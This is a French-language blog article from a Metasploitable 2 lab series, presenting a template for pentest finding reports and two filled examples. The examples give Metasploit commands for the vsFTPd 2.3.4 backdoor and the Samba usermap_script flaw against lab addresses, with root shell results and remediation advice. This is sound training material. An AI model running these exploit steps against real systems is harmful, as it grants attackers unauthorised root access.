Skip to main content

Findings

579 words·3 mins·
metasploitable2 - This article is part of a series.
Part 6: This Article

Fiche finding — référentiel Metasploitable 2
#


1. Rôle de la fiche finding
#

La fiche de finding détaille chaque Exploitation, du comment jusqu’à la preuve d’impact.

ÉlémentDétail
ButDocumenter une vulnérabilité prouvée (pas seulement détectée par OpenVAS)
QuandAprès chaque exploit réussi (phase exploitation)
Public cibleRSSI + équipe technique

2. Modèle standard (à remplir)
#

## [TF-XX] Titre court — Service

**Criticité :** Critique / Haute / Moyenne (CVSS x.x si pertinent)
**Actif :** 192.168.56.102 — nom service / port
**Référence :** CVE-XXXX-XXXX (si applicable)

### Description
2–4 phrases : nature de la faille, contexte MS2, lien avec scan OpenVAS/Nessus.

### Reproduction
1. Contexte (depuis Kali 192.168.56.10, grey box interne)
2. Commande ou module MSF (`use`, `set RHOSTS`, `run`)
3. Post-exploit minimal (`id`, `hostname`)
4. Résultat attendu

### Preuve
[Screenshot : sortie `id` / session MSF — horodaté]

### Impact (TechFlow fictif)
Impact métier : accès shell non autorisé, pivot LAN, données sur serveur test…

### Recommandation
Correctif : patch version, désactiver service, segmentation, durcissement…
Priorité : immédiat / 30j / 90j

3. Exemple rempli — vsFTPd 2.3.4 (MS2)
#

## [TF-01] Backdoor vsFTPd 2.3.4 — FTP

**Criticité :** Critique (CVSS ~10.0 contexte lab)
**Actif :** 192.168.56.102 — vsftpd / TCP 21
**Référence :** CVE-2011-2523

### Description
Le service FTP vsFTPd 2.3.4 présente une backdoor activée par le login « :) »,
permettant l'exécution de commandes système. Détecté par OpenVAS et confirmé
par exploitation Metasploit sur le segment lab TechFlow.

### Reproduction
1. Depuis Kali (172.16.211.219), vérifier port 21 ouvert (reconnaissance).
2. msfconsole : `use exploit/unix/ftp/vsftpd_234_backdoor`, `set LHOST 172.16.211.219`, `set RHOSTS 172.16.211.218`, `run`.
3. Session obtenue : `id` → uid=0(root).

### Preuve
[Capture : sessions -l + id root]

### Impact
Un attaquant interne au VLAN test obtient un shell root sur le serveur legacy,
permettant lecture de fichiers locaux et pivot vers d'autres actifs du segment.

### Recommandation
Mettre à jour vsFTPd hors version 2.3.4 vulnérable ; désactiver FTP clair ;
remplacer par SFTP. Priorité : immédiat.

4. Exemple rempli — Samba usermap_script
#

## [TF-02] Injection Samba usermap_script — SMB

**Criticité :** Critique
**Actif :** 192.168.56.102 — Samba / TCP 445
**Référence :** CVE-2007-2447

### Description
Samba mal configuré permet l'exécution de commandes via le mécanisme
username map script. Confirmé après scan Nessus (plugin Samba).

### Reproduction
1. `use exploit/multi/samba/usermap_script`
2. `set LHOST 172.16.211.219`, `set RHOSTS 172.16.211.218`, `run`
3. `id` → root.

### Preuve
[Capture getuid / id]

### Impact (TechFlow fictif)
Compromission complète du serveur fichier de test ; risque de propagation
via comptes de service SMB.

### Recommandation
Patcher Samba ; restreindre SMB au VLAN management ; désactiver scripts
map sur serveurs exposés. Priorité : immédiat.

5. Identifiants & nommage
#

ConventionExemple
ID rapportTF-01TF-06 (TechFlow)
TitreService + type faille court
ActifToujours IP lab + port/service
Lien scanMentionner OpenVAS/Nessus dans Description

6. Chaîne documentaire
#

Tableau recon ──┐
Rapport scan  ──┼──► Fiche finding (exploit prouvé)
Post-exploit  ──┘
               Rapport (synthèse)

7. Travail autonome (avant le rapport)
#

  1. Finaliser 2 fiches réseau (exploits MSF)
  2. Esquisser 1 fiche web (Mutillidae) — champs vides OK
  3. Vérifier cohérence IDs avec rapport

8. Suite de la démarche
#

Phase actuelle : Fiches finding — vulnérabilités prouvées documentées (repro, preuve, impact, correctif).

[✓] Mise en place  →  [✓] Reconnaissance  →  [✓] Scan vulns  →  [✓] Exploitation  →  [✓] Post-exploit  →  [●] Findings  →  [ ] Rapport

Étape suivante : Rapport — synthèse exécutive, matrice risque × effort et roadmap 30/90/180 jours.

metasploitable2 - This article is part of a series.
Part 6: This Article